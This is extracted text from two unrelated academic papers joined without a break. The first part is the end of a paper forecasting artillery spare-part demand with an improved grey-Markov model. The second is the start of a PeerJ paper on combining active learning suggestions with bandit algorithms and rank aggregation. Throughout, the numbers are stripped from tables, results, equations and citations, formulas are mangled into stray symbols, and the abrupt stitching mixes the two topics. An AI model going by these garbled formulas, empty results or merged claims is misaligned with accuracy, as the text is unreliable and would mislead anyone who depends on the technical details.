grammar: a. experiment verification taking the consumption of a spare part of a certain type of self-propelled artillery of the military machinery maintenance institute as an example, table i. is the historical data of the consumption of a certain spare part during the continuous service of a certain type of self-propelled artillery of ~ for years, with the serial number of the spare part as the horizontal axis, and the demand for spare parts for the vertical axis, the improved gray markov model is used to predict the future demand for spare parts. international journal of advanced network, monitoring and controls volume , no. , table i. historical data of spare parts consumption of a certain equipment serial number number of spare parts the following data is used as a sample, and the improved gray-markov model and other models are used to predict the number of spare parts for the eighth time, and a comparative analysis is made. using the improved gray-markov model to predict the demand for spare parts: from the above data can be obtained   , , , , , , , ) ( x it can be obtained by smoothing the historical data of the demand for spare parts of weapons and equipment } . , . , . , . , . , . , . { x  therefore, ) ( x needs to be exchanged for translation. take . c , after calculation, we can get   . , . , . , . , . , . , . , . ) ( y } . , . , . , . , . , . , . { y  so, the ) ( y sequence can be operated with the gray model, and finally subtract c to obtain ) ( x using equation to do an accumulation generator for we can get   , . , . , . , , . , , . ) ( y the sequence is generated by using the immediate mean for ,which can be obtained according to equation . } . , . , . , . , . , . , . { ) ( z establish prediction equations according to formulas , , and . . )( ) ( . ) (    k eky find the reduction value according to equations and } . , . , . , . , . , . , . , . { ) (   y } . , . , . , . , . , . , . { ) ( x through the prediction of the gray model, you can get the fitted figure of the simulated value and the actual value after data processing as shown in figure . figure . fitting diagram of simulated value and actual value obtain the relative residual sequence according to equation } . , . , . , . , . , . , . { ) (   to divide the state, the upper and lower limits of the state are       )min()max( . )max( )min()max( . )min( ) () () ( max ) () () ( min   the range of the residual error is expanded by % above and below, calculated   . , .  the interval between the cells in the state is taken to be equal, and the number of states is sequentially selected from to be calculated. the maximum value is the sequence length. from this, sets of trial calculation results can be obtained. calculate the one-step state transition probability matrix according to equation international journal of advanced network, monitoring and controls volume , no. ,              . . . . . . . p ( ) use the state transition probability matrix to obtain the prediction results, as shown in table ii table ii. forecast results raw data model calculation data raw data model calculation data . . . . . . . . . . . . . . . . predict three numbers . . . the state transition probability matrix is used to predict the consumption of spare parts for a certain equipment spare part in the future time period, but its accuracy and accuracy need to be calculated using error analysis formulas, and compared with other gray models or classic gray-markov models. b. model comparison average error calculation: )(      n ke e n k ( ) first, according to the average error calculation formula, calculate the average error of the model when different states are divided. as shown in table Ⅲ, it can be seen that when the number of states is , the accuracy of the model is the highest. table iii. model average error under different state division number of states model mean error number of states model mean error . % undesirable . % undesirable . % undesirable undesirable — — second, the classic gray-markov model is used for prediction, and the prediction accuracy is compared, as listed in table Ⅳ. table iv. forecast accuracy obtained by using different models gm( , )model number of states classic model improve the model . % . % . % . % . % undesirable . % undesirable undesirable undesirable undesirable when the number of state divisions is , , the accuracy of the improved model is about . times and . times higher than that of the model, which is the same as the accuracy of the classic gray markov prediction model. when the number of state divisions is , the accuracy of the improved model is about . times higher than that of the model, and the classical markov prediction model cannot achieve the prediction effect because it cannot build a successful markov chain state transition probability matrix. as the number of state divisions increases, the average accuracy of the improved gray markov model is on the rise. the improved model supports more number of state divisions, so it is better than the classic gray markov prediction model. the application environment of the gray prediction method is relatively loose. it does not need to determine whether the data changes follow the same type of distribution. it does not require large sample statistics to make predictions. it has certain application prospects. vi. conclusion in the field of spare parts support for weapons and equipment, forecasting has always been a relatively difficult problem. due to the time-varying and random characteristics of weapon equipment spare parts demand, this paper proposes to predict the demand of weapon equipment spare parts based on the improved gray-markov prediction method. by comparing the prediction results, the modified model is superior to the traditional gray model and classic the gray-markov model has high prediction accuracy and provides a reliable scientific basis for the evaluation of weapon equipment reliability and the maintenance of its equipment. international journal of advanced network, monitoring and controls volume , no. , acknowledgment this work is supported by the shanxi natural science basic research project ( jm- ) for its fund support. references [ ] shao yanjun. research on preventive maintenance strategy of weapon equipment based on fault prediction [d]. north university of china, . [ ] yan xiaoyao, yan li. application of neural network in the forecast of aviation weapon equipment spare parts demand [j]. today keyuan, ( ): - . [ ] zhou hao, huang shanzhong. equipment consumption prediction based on gm( , ) and grey markov model[j]. journal of wuhan university of technology (transportation science and engineering edition). , ( ): - + . [ ] qiu chundong, yang yuzhi, wang chunyun. prediction of ct tube failure interval based on gray markov chain model [j]. modern instruments and medical, , ( ): - + . [ ] xu ning, dang yaoguo, ding song. gm( , ) model background value optimization method based on error minimization[j]. control and decision. , ( ): - . [ ] lv z, hou h, yi z, singh hp, editors. grey prediction model application in early warning of ice-coating lines[c]. recent developments in control, automation and power engineering (rdcape), international conference on; - march . [ ] ma liangli, li gang, tao daoqiang. fault prediction method based on gray gm( , ) model[j]. computer applications and software. , ( ): - . [ ] shi pei, gao shan, su yanqin. an improved gm( , ) model used in equipment fault prediction [j]. computer measurement and control. , ( ): - . [ ] zhang wenjie, yuan hongping. research on the failure prediction of energy-saving equipment based on grey markov model[j]. system science and mathematics, , ( ): - . [ ] li li, xiong wei, he jie, yuan xufeng, zou xiaosong. equipment failure rate prediction based on improved grey markov model [j]. electric power science and engineering, , ( ): - . [ ] hong zhanpeng, chen zhenghua. gray markov model for metro car door failure prediction [j]. equipment manufacturing technology, ( ): - . [ ] ma chunmao, shao yanjun, pan hongxia, liu yongjiang. research on prediction of equipment failure interval based on gray markov model [j]. journal of ordnance engineering, , ( ): - . combining active learning suggestions combining active learning suggestions alasdair tran , , cheng soon ong , and christian wolf , research school of computer science, australian national university, canberra, act, australia data to decisions cooperative research centre, adelaide, sa, australia machine learning research group, data , csiro, canberra, act, australia research school of astronomy and astrophysics, australian national university, canberra, act, australia arc centre of excellence for all-sky astrophysics (caastro), sydney, nsw, australia abstract we study the problem of combining active learning suggestions to identify informative training examples by empirically comparing methods on benchmark datasets. many active learning heuristics for classification problems have been proposed to help us pick which instance to annotate next. but what is the optimal heuristic for a particular source of data? motivated by the success of methods that combine predictors, we combine active learners with bandit algorithms and rank aggregation methods. we demonstrate that a combination of active learners outperforms passive learning in large benchmark datasets and removes the need to pick a particular active learner a priori. we discuss challenges to finding good rewards for bandit approaches and show that rank aggregation performs well. subjects data mining and machine learning keywords active learning, bandit, rank aggregation, benchmark, multiclass classification introduction recent advances in sensors and scientific instruments have led to an increasing use of machine learning techniques to manage the data deluge. supervised learning has become a widely used paradigm in many big data applications. this relies on building a training set of labeled examples, which is time-consuming as it requires manual annotation from human experts. the most common approach to producing a training set is passive learning, where we randomly select an instance from a large pool of unlabeled data to annotate, and we continue doing this until the training set reaches a certain size or until the classifier makes sufficiently good predictions. depending on how the underlying data is distributed, this process can be quite inefficient. alternatively we can exploit the current set of labeled data to identify more informative unlabeled examples to annotate. for instance we can pick examples near the decision boundary of the classifier, where the class probability estimates are uncertain (i.e., we are still unsure which class the example belongs to). many active learning heuristics have been developed to reduce the labeling bottleneck without sacrificing the classifier performance. these heuristics actively choose the most informative examples to be labeled based on the predicted class probabilities. “overview of active learning” describes two families of algorithms in detail: uncertainty sampling and version space reduction. in this paper, we present a survey of how we can combine suggestions from various active learning heuristics. in supervised learning, combining predictors is a well-studied how to cite this article tran et al. ( ), combining active learning suggestions. peerj comput. sci. :e ; doi . /peerj-cs. submitted january accepted june published july corresponding author alasdair tran, alasdair.tran@anu.edu.au academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright tran et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:alasdair.�tran@�anu.�edu.�au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ problem. many techniques such as adaboost (freund & schapire, ) (which averages predictions from a set of models) and decision trees (breiman et al., ) (which select one model for making predictions in each region of the input space) have been shown to perform better than just using a single model. inspired by this success, we propose to combine active learning suggestions with bandit and rank aggregation methods in “combining suggestions.” the use of bandit algorithms to combine active learners has been studied before (baram, el-yaniv & luz, ; hsu & lin, ). borda count, a simple rank aggregation method, has been used in the context of multi-task learning for linguistic annotations (reichart et al., ), where we have one active learner selecting examples to improve the performance of multiple related tasks (e.g., part-of-speech tagging and name entity recognition). borda count has also been used in multi-label learning (reyes, morell & ventura, ) to combine uncertainty information from multiple labels. as far as we know, other aggregation methods have not been explored and our work is the first time that social choice theory is used to rank and aggregate suggestions from multiple active learners. this paper makes the following two main contributions: . we empirically compare four bandit and three rank aggregation algorithms in the context of combining active learning heuristics. we apply these algorithms to benchmark datasets from the uci machine learning repository (lichman, ) and a large dataset from the sloan digital sky survey (sdss) (alam et al., ). the experimental setup and discussion are described in “experimental protocol, results, and discussion.” . we propose two metrics for evaluation: the mean posterior balanced accuracy (mpba) and the strength of an algorithm. the mpba extends the metric proposed in brodersen et al. ( ) from the binary to the multi-class setting. this is an accuracy measure that takes class imbalance into account. the strength measure is a variation on the deficiency measure used in baram, el-yaniv & luz ( ) which evaluates the performance of an active learner or combiner, relative to passive learning. the main difference between our measure and that of baram, el-yaniv & luz ( ) is that ours assigns a higher number for better active learning methods and ensures that it is upper-bounded by for easier comparison across datasets. overview of active learning in this paper we consider the binary and multiclass classification settings where we would like to learn a classifier h, which is a function that maps some feature space x � rd to a probability distribution over a finite label space y: h : x ! pðyÞ ( ) in other words, we require that the classifier produces class probability estimates for each unlabeled example. for instance, in logistic regression with only two classes, i.e., y ¼f ; g, we can model the probability that an object with feature vector x belongs to the positive class with tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hðx; θÞ¼ pðy ¼ jx; θÞ¼ þ e�θt x ( ) and the optimal weight vector θ is learned in training. we can further consider kernel logistic regression, where the feature space x is the feature space corresponding to a given kernel, allowing for non-linear decision functions. in active learning, we use the class probability estimates from a trained classifier to estimate a score of informativeness for each unlabeled example. in pool-based active learning, where we select an object from a pool of unlabeled examples at each time step, we require that some objects have already been labeled. in practice this normally means that we label a small random sample at the beginning. these become the labeled training set lt �x �y and the rest form the unlabeled set u �x. now consider the problem of choosing the next example in u for querying. labeling can be a very expensive task, because it requires using expensive equipment or human experts to manually examine each object. thus, we want to be smart in choosing the next example. this motivates us to come up with a rule s(x; h) that gives each unlabeled example a score based only on their feature vector x and the current classifier h. recall that the classifier produces p(y), a probability estimate for each class. we use these probability estimates from the classifier over the unlabeled examples to calculate the scores: s : pðyÞ! r ( ) the value of s(x; h) indicates the informativeness of example x, where bigger is better. we would then label the example with the largest value of s(x; h). this will be our active learning rule r: rðu; hÞ¼ arg max x u sðx; hÞ ( ) algorithm outlines the standard pool-based active learning setting. coming up with an optimal rule is itself a difficult problem, but there have been many attempts to derive good heuristics. five common ones, which we shall use in our experiments, are described in “uncertainty sampling” and “version space reduction.” algorithm the pool-based active learning algorithm. input: unlabeled set u, labeled training set ℒt, classifier h(x), and active learner rðu; hÞ. repeat select the most informative candidate x� from u using the active learning rule rðu; hÞ. ask the expert to label x�. call the label y�. add the newly labeled example to the training set: lt lt [fðx�; y�Þg. remove the newly labeled example from the unlabeled set: u unfx�g. retrain the classifier h(x) using ℒt. until we have enough training examples. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ there are also heuristics that involve minimizing the variance or maximizing the classifier certainty of the model (schein & ungar, ), but they are computationally expensive. for example, in the variance minimization heuristic, the score of a candidate example is the expected reduction in the model variance if that example were in the training set. to compute this reduction, we first need to give the example each of the possible labels, add it to the training set, and update the classifier. this is expensive to run since in each iteration, the classifier needs to be retrained k �u times, where k is the number of classes and u is the size of the unlabeled pool. there are techniques to speed this up such as using online training or assigning a score to only a small subset of the unlabeled pool. preliminary experiments showed that these heuristics do not perform as well as the simpler ones (tran, ), so we do not consider them in this paper. a more comprehensive treatment of these active learning heuristics can be found in (settles, ). uncertainty sampling lewis & gale ( ) introduced uncertainty sampling, where we select the instance whose class membership the classifier is least certain about. these tend to be points that are near the decision boundary of the classifier. perhaps the simplest way to quantify uncertainty is the least confidence heuristic (culotta & mccallum, ), where we pick the candidate whose most likely label the classifier is most uncertain about: rlcðu; hÞ¼ arg max x u �max y y pðy jx; hÞ � � ( ) where p(y|x; h) is the probability that the object with feature vector x belongs to class y under classifier h. for consistency, we have flipped the sign of the score function so that the candidate with the highest score is picked. a second option is to calculate the entropy (shannon, ), which measures the amount of information needed to encode a distribution. intuitively, the closer the class probabilities of an object are to a uniform distribution, the higher its entropy will be. this gives us the heuristic of picking the candidate with the highest entropy of the distribution over the classes: rheðu; hÞ¼ arg max x u � x y y pðy jx; hÞ log½pðy jx; hÞ� ( ) ( ) as a third option we can pick the candidate with the smallest margin, which is defined as the difference between the two highest class probabilities (scheffer, decomain & wrobel, ): rsmðu; hÞ¼ arg max x u � max y y pðy jx; hÞ� max z ynfy�g pðz jx; hÞ � �� � ( ) where y� ¼ arg maxy y pðz jx; hÞand we again flip the sign of the score function. since the sum of all probabilities must be , the smaller the margin is, the harder it is to differentiate between the two most likely labels. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an extension to the above three heuristics is to weight the score with the information density so that we give more importance to instances in regions of high density: sidðu; hÞ¼ u xe k ¼ simðx; xðkÞÞ ! sðx; hÞ ( ) where h is the classifier, s(x; h) is the original score function of the instance with feature vector x, u is the size of the unlabeled pool, and sim(x, x (k) ) is the similarity between x and another instance x (k) using the gaussian kernel with parameter g: simðx; xðkÞÞ ¼ expðgjjx �xðkÞjj Þ ( ) the information density weighting was proposed by settles & craven ( ) to discourage the active learner from picking outliers. although the class membership of outliers might be uncertain, knowing their labels would probably not affect the classifier performance on the data as a whole. version space reduction instead of focusing on the uncertainty of individual predictions, we could instead try to constrain the size of the version space, thus allowing the search for the optimal classifier to be more precise. the version space is defined as the set of all possible classifiers that are consistent with the current training set. to quantify the size of this space, we can train a committee of b classifiers, b = {h , h , ..., hb}, and measure the disagreement among the members of the committee about an object’s class membership. ideally, each member should be as different from the others as possible but still be in the version space (melville & mooney, ). in order to have this diversity, we give each member only a subset of the training examples. since there might not be enough training data, we need to use bootstrapping and select samples with replacement. hence this method is often called query by bagging (qbb). one way to measure the level of disagreement is to calculate the margin using the class probabilities estimated by the committee (melville & mooney, ): rqbbmðu; hÞ¼ arg max x u � max y y pðy jx;bÞ� max z ynfy�g pðz jx;bÞ � �� � ( ) where y� ¼ arg max y y pðz jx;bÞ ( ) pðz jx;bÞ¼ b x b b pðy jx; hbÞ ( ) this looks similar to one of the uncertainty sampling heuristics, except now we use p(y|x; b) instead of p(y|x; h). that is, we first average out the class probabilities predicted by the members before minimizing the margin. mccallum & nigam ( ) offered an alternative disagreement measure which involves picking tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the candidate with the largest mean kullback–leibler (kl) divergence from the average: rqbbklðu; hÞ ¼ arg max x u b xb b ¼ dklðpb k pbÞ ( ) ( ) where dkl(pb‖pb) is the kl divergence from pb (the probability distribution that is averaged across the committee b), to pb (the distribution predicted by a member b ∈ b): dklðpb k pbÞ¼ x y y pðy jx; hbÞ ln pðy jx; hbÞ pðy jx;bÞ ( ) for convenience, we summarize the five heuristics discussed above in table . combining suggestions out of the five heuristics discussed, which one should we use in practice when we would like to apply active learning to a particular problem? there have been some attempts in the literature to do a theoretical analysis of their performance. proofs are however scarce, and when there is one available, they normally only work under restrictive assumptions. for example, freund et al. ( ) showed that the query by committee algorithm (a slight variant of our two qbb heuristics) guarantees an exponential decrease in the prediction error with the training size, but only when there is no noise. in general, whether any of these heuristics is guaranteed to beat passive learning is still an open question. even though we do not know which one is the best, we can still combine suggestions from all of the heuristics. this can be thought of as the problem of prediction with expert advice, where each expert is an active learning heuristic. in this paper we explore two different approaches: we can either consider the advice of only one expert at each time step (with bandit algorithms), or we can aggregate the advice of all the experts (with social choice theory). combining suggestions with bandit theory first let us turn our attention to the multi-armed bandit problem in probability theory (berry & fristedt, ). the colorful name originates from the situation where a gambler table summary of active learning heuristics used in our experiments. abbreviation heuristic objective function confidence least confidence arg max x u �maxy y pðyjx; hÞ � � entropy highest entropy arg max x u � �py y pðyjx; hÞ log½pðyjx; hÞ�� margin smallest margin arg max x u � maxy y pðyjx; hÞ�maxz ynfy�g pðzjx; hÞ � � � qbb-margin smallest qbb margin arg max x u � maxy y pðyjx;bÞ�maxz ynfy�g pðzjx;bÞ � � � qbb-kl largest qbb kl arg max x u � b pb b¼ dklðpb k pbÞ � note: notations: p(y|x; h) is the probability of that an object with feature vector x has label y under classifier h,b is the set ofb classifiers {h , h , : : : , hb}, y is the set of possible labels, y� is the most certain label, u is the set of unlabeled instances, dkl(p||q) is the kullback–leibler divergence of p from q, and pb is the class distribution averaged across classifiers in b. for consistency, with heuristics that use minimization, we flip the sign of the score so that we can always take the argmax to get the best candidate. tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ stands in front of a slot machine with r levers. when pulled, each lever gives out a reward according to some unknown distribution. the goal of the game is to come up with a strategy that can maximize the gambler’s lifetime rewards. in the context of active learning, each lever is a heuristic with a different ability to identify the candidate whose labeling information is most valuable. the main problem in multi-armed bandits is the trade-off between exploring random heuristics and exploiting the best heuristic so far. there are many situations in which we find our previously held beliefs to be completely wrong. by always exploiting, we could miss out on the best heuristic. on the other hand, if we explore too much, it could take us a long time to reach the desired accuracy. bandit algorithms do not need to know the internal workings of the heuristics, but only the reward received from using any of them. at each time step, we receive a reward from a heuristic, and based on the history of all the rewards, the bandit algorithm can decide on which heuristic to pick next. formally, we need to learn the function b : ðjr �½ ; �Þn ! jr ( ) where b is the bandit algorithm, the reward is normalized between and , jℛ is the index set over the set of heuristics ℛ, and n is the time horizon. what would be an appropriate reward w in this setting? we propose using the incremental increase in the performance of the test set after the candidate is added to the training set. this, of course, means that we need to keep a separate labeled test set around, just for the purpose of computing the rewards. we could, as is common practice in machine learning, use cross validation or bootstrap on ℒt to estimate the generalization performance. however for simplicity of presentation we use a separate test set ℒs. figure and algorithm outline how bandits can be used in pool-based active learning. the only difference between the bandit algorithms lies in the select function that selects which heuristic to use, and the update function that updates the algorithm’s selection parameters when receiving a new reward. train with classifier h assign scores with s select candidate with highest score label candidateadd to training pool select heuristic with b chosen heuristic r lt p(y) x∗(x∗, y∗) ls u reward w r figure active learning pipeline with bandit algorithms. we need to collect rewards w from the test set ℒs in order to decide which heuristic to choose at each time step. this routine is indicated by the red arrows. notations: ℛ is the set of heuristics {r , : : : , rr}, ℒt is the training set, ℒs is the test set, u is the unlabeled set, and p(y) is the predicted class probabilities on the unlabeled data u. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ there have been some attempts to combine active learning suggestions in the literature. baram, el-yaniv & luz ( ) used the exp multi-armed bandit algorithm to automate the selection process. they proposed a reward called the classification entropy maximization, which can be shown to grow at a similar rate to the true accuracy in binary classification with support vector machines (svms). we will not compare our results directly with those in baram, el-yaniv & luz ( ) since we would like to evaluate algorithms that can work with both binary and multi-class classification. our experiments also use logistic regression which produces probability estimates directly, rather than svms which can only produce unnormalized scores. hsu & lin ( ) studied an improved version of exp , called exp .p, and used importance weighting to estimate the true classifier performance using only the training set. in this paper, we empirically compare the following four bandit algorithms: thompson sampling, oc- ucb, kl-ucb, and exp ++. thompson sampling the oldest bandit algorithm is thompson sampling (thompson, ) which solves the exploration-exploitation trade-off from a bayesian perspective. let wi be the reward of heuristic ri ∈ ℛ. observe that even with the best heuristic, we still might not score perfectly due to having a poor classifier trained on finite data. conversely, a bad heuristic might be able to pick an informative candidate due to pure luck. thus there is always a certain level of randomness in the reward received. let us treat the reward wi as a normally distributed random variable with mean νi and variance t i : ðwi j�iÞ �nð�i; t i Þ ( ) if we knew both νi and ti for all heuristics, the problem would become trivially easy since we just need to always use the heuristic that has the highest mean algorithm pool-based active learning with bandit theory. note that in addition to the set of active learning heuristics ℛ and the test set ℒs, some bandit algorithms also need to know n, the maximum size of the training set, in advance. input: unlabeled set u, labeled training set ℒt, labeled test set ℒs, classifier h, desired training size n, set of active learning heuristics ℛ, and bandit algorithm b with two functions select and update. while jℒtj < n do select a heuristic r� ∈ ℛ according to select. select the most informative candidate x� from u using the chosen heuristic r� (u; h). ask the expert to label x�. call the label y�. add the newly labeled example to the training set: lt lt [fðx�; y�Þg. remove the newly labeled example from the unlabeled set: u unfx�g. retrain the classifier h(x) using ℒt. run the updated classifier on the test set ℒs to compute the increase in the performance w. update the parameters of b with update(w). end tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ reward. in practice, we do not know the true mean of the reward νi, so let us add a second layer of randomness and assume that the mean itself follows a normal distribution: �i �nðmi; s iÞ ( ) to make the problem tractable, let us assume that the variance ti in the first layer is a known constant. the goal now is to find a good algorithm that can estimate mi and si . we start with a prior on mi and si for each heuristic ri. the choice of prior does not usually matter in the long run. since initially we do not have any information about the performance of each heuristic, the appropriate prior value for mi is , i.e., there is no evidence (yet) that any of the heuristics offers an improvement to the performance. in each round, we draw a random sample νi′ from the normal distribution nðmi; s iÞ for each i and select heuristic r� that has the highest sampled value of the mean reward: r� ¼ arg max i v i ( ) we then use this heuristic to select the object that is deemed to be the most informative, add it to the training set, and retrain the classifier. next we use the updated classifier to predict the labels of objects in the test set. let w be the reward observed. we now have a new piece of information that we can use to update our prior belief about the mean m� and the variance s� of the mean reward. using bayes’ theorem, we can show that the posterior distribution of the mean reward remains normal, ð�� j w� ¼ wÞ�nðm �; s � Þ ( ) with the following new mean and variance: m � ¼ m�t � þws � s � þt � s � ¼ s �t � s � þt � ( ) algorithm summarizes the selectand update functions used in thompson sampling. upper confidence bounds next we consider the upper confidence bound (ucb) algorithms which use the principle of “optimism in the face of uncertainty.” in choosing which heuristic to use, we first estimate the upper bound of the reward (that is, we make an optimistic guess) and pick algorithm thompson sampling with normally distributed rewards. notations: ℛ is the set of r heuristics, m is the mean parameter of the average reward, s is the variance parameter of the average reward, t is the known variance parameter of the reward, and w is the actual reward received. function select() for i ∈ { , , ..., r} do νi′ draw a sample from nðmi; s i Þ end select the heuristic with the highest sampled value: r� argmax i � i function update(w) m� m�t � þws � s � þt � s � s �t � s � þt � tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the one with the highest bound. if our guess turns out to be wrong, the upper bound of the chosen heuristic will decrease, making it less likely to get selected in the next iteration. there are many different algorithms in the ucb family, e.g., ucb -tuned & ucb (auer, cesa-bianchi & fischer, a), v-ucb (audibert, munos & szepesvári, ), oc-ucb (lattimore, ), and kl-ucb (cappé et al., ). they differ only in the way the upper bound is calculated. in this paper, we only consider the last two. in optimally confident ucb (oc-ucb), lattimore ( ) suggests that we pick the heuristic that maximizes the following upper bound: r� ¼ arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi a tiðtÞ ln cn t � �s ! ( ) where wi is the average of the rewards from ri that we have observed so far, t is the time step, ti(t) is the number times we have selected heuristic ri before step t, and n is the maximum number of steps that we are going to take. there are two tunable parameters, a and c, which the author suggests setting to and , respectively. in kl-ucb, cappé et al. ( ) suggest that we can instead consider the kl-divergence between the distribution of the current estimated reward and that of the upper bound. in the case of normally distributed rewards with known variance s , the chosen heuristic would be r� ¼ arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi s lnðtiðtÞÞ t r ! ( ) algorithms and summarize these two ucb approaches. note that the size of the reward w is not used in update (w) of ucb, except to select the best arm. algorithm optimally confident ucb. notations: n is the time horizon (maximum number of time steps), t is the current time step, ti(t) counts how many times heuristic i has been selected before step t, w is the reward received, and wi is the average of the rewards from ri so far. fuction select() r� arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi tiðtÞ ln � n t �r function update(w) t t þ t�ðtÞ t�ðt � Þþ algorithm kl-ucb with normally distributed rewards. notations: s is the variance of the rewards, t is the current time step, ti(t) counts how many times heuristic i has been selected before step t, w is the reward received, and wi is the average of the rewards from ri so far. function select() r� arg max i wi þ ffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffiffi s lnðtiðtÞÞ t r function update(w) t t þ t�ðtÞ t�ðt � Þþ tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ exp ++ the exponential-weight algorithm for exploration and exploitation (exp ) was first developed by auer et al. ( b) to solve the non-stochastic bandit problem where we make no statistical assumptions about the reward distribution. this is also often known as the adversarial setting, where we have an adversary who generates an arbitrary sequence of rewards for each heuristic in advance. like thompson sampling, the algorithm samples from a probability distribution at each step to pick a heuristic. here however, we construct the distribution with exponential weighting (hence the name exp ). we shall test seldin & slivkins ( )’s exp ++ algorithm (see algorithm ). this is a generalization of the original exp and it has been shown to perform well in both the stochastic (where the reward of each heuristic follows an unknown reward distribution) and the adversarial regime. combining suggestions with social choice theory a drawback of the above bandit methods is that at each iteration, we could only use one suggestion from one particular heuristic. exp and exp .p algorithms can take advice from all heuristics by maintaining a weight on each of them. however, being a bandit method, they require designing a reward scheme. if the reward is the performance on a test set, we would need to keep around a separate subset of the data, which is expensive and sometimes impossible to obtain in practice. this leads us to social choice theory, which can combine suggestions like exp and exp .p, while not needing the concept of a reward. originally developed by political scientists like nicolas de condorcet and jean-charles de borda, this field of study is concerned with how we aggregate preferences of a group of people to determine, for example, the winner in an election algorithm exp ++ algorithm. notations: ℛ is the set of r heuristics, t is the current time step, b is a parameter used to weight the heuristics for selection, ξi and εi are used to compute the loss li, ρ is the distribution from which a heuristic is sampled, and w is the reward received. function select() b ¼ ffiffiffiffiffiffiffiffi ln r tr r for i ∈ { , , ..., r} do ji ¼ inðtÞ tminð ; t ðli �minðlÞÞÞ εi ¼ min � r ; b; ji � ri ¼ e�b�lip j e �b�lj end r� draw a sample from ℛ with probability distribution ρ. function update (w) t t þ t�ðtÞ t�ðt � Þþ l� l� þð �wÞ ð �pj εjÞw� þ ε� tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (list, ). it has the nice property that everyone (or in our context, every active learning heuristic) has a voice. for each heuristic, we assign a score to every candidate with the score function s(x, h) like before. we are neither interested in the actual raw scores nor the candidate with the highest score. instead, we only need a ranking of the candidates, which is achieved by a function kðs;uÞ that provides a ranking of the unlabeled examples according to their scores. for example, k could assign the candidate with the highest score a rank of , the next best candidate a rank of , and so on. an aggregation function c will then combine all the rankings into a combined ranking, c : sðjuÞr ! sðjuÞ ( ) where sðjuÞ is a permutation over the index set of the unlabeled pool u and r is the number of heuristics. from these we can pick the highest-ranked candidate to annotate. see table for an example. the main difference between this approach and the bandit algorithms is that we do not consider the reward history when combining the rankings. here each heuristic is assumed to always have an equal weight. a possible extension, which is not considered in this paper, is to use the past performance to re-weight the heuristics before aggregating at each step. figure and algorithm provide an overview of how social choice theory is used in pool-based active learning. the central question in social choice theory is how we can come up with a good preference aggregation rule. we shall examine three aggregation rules: borda count, the geometric mean, and the schulze method. in the simplest approach, borda count, we assign an integer point to each candidate. the lowest-ranked candidate receives a point of , and each candidate receives one more point than the candidate below. to aggregate, we simply add up all the points each table an example of how to convert raw scores into a ranking. score s(x; h) . . . . rank k(s, u) train with classifier h assign scores with s ,.., sr convert to rankings with k aggregate rankings with cselect highest ranked candidate add to training pool label candidate lt u p(y) σ (ju ), ..., σr(ju ) σ(ju )x∗(x∗, y∗) r figure active learning pipeline with rank aggregation methods. unlike the bandit pipeline, there is only one cycle in which we aggregate information from all heuristics. additional notation: sðjuÞ is a permutation (i.e., rank) on the index set of the unlabeled data. full-size doi: . /peerj-cs. /fig- tran et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ candidate receives from every heuristic. the candidate with the most points is declared the winner and is to be labeled next. we can think of borda count, then, as ranking the candidate according to the arithmetic mean. an alternative approach is to use the geometric mean, where instead of adding up the points, we multiply them. bedö & ong ( ) showed that the geometric mean maximizes the spearman correlation between the ranks. note that this method requires the ranks to be scaled so that they lie strictly between and . this can be achieved by simply dividing the ranks by (u + ), where u is the number of candidates. the third approach we consider is the schulze method (schulze, ). out of the three methods considered, this is the only one that fulfills the condorcet criterion, i.e., the winner chosen by the algorithm is also the winner when compared individually with each of the other candidates. however, the schulze method is more computationally intensive since it requires examining all pairs of candidates. first we compute the number of heuristics that prefer candidate xi to candidate xj, for all possible pairs (xi, xj). let us call this d(xi, xj). let us also define a path from candidate xi to xj as the sequence of candidates, {xi, x , x , ..., xj}, that starts with xi and ends with xj, where, as we move along the path, the number of heuristics that prefer the current candidate over the next candidate must be strictly decreasing. intuitively, the path is the rank of a subset of candidates, where xi is the highest-ranked candidate and xj is at the lowest-ranked. associated with each path is a strength p, which is the minimum of d(xi, xj) for all consecutive xi and xj along the path. the core part of the algorithm involves finding the path of the maximal strength from each candidate to every other. let us call p(xi, xj) the strength of strongest path between xi and xj. candidate xi is a potential winner if pðxi; xjÞ pðxj; xiÞ for all other xj. this problem has a similar flavor to the problem of finding the shortest path. in fact, the implementation uses a variant of the floyd–warshall algorithm to find the strongest path. this is the most efficient implementation that we know of, taking cubic time in the number of candidates. algorithm pool-based active learning with social choice theory. input: unlabeled set u, labeled training set ℒt, classifier h, set of active learning suggestions r, ranking function k, and rank aggregator c. repeat: for 